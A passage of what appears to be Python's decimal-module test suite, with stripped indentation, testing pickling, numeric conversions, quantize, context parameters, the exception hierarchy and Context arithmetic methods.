self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
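# int() truncates toward zero (e.g. int(Decimal('-10.99')) == -10);
# NaNs raise ValueError and infinities raise OverflowError, as for float.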
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
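# from_float() should honour the subclass and convert the binary float
# exactly, without any context rounding.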
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
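# Unlike Decimal.from_float(), create_decimal_from_float() applies the
# context's precision and rounding, and honours the Inexact trap.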
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
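# xc is a deliberately tiny context (prec=1, Emax=1, Emin=-1); passing it
# explicitly should update xc.flags only, never the ambient context c.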
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
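# Every signal derives from DecimalException (an ArithmeticError); some
# also inherit from the matching built-in exception, e.g. DivisionByZero
# from ZeroDivisionError and FloatOperation from TypeError.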
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
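# Explicit None arguments must produce the same defaults as Context().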
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
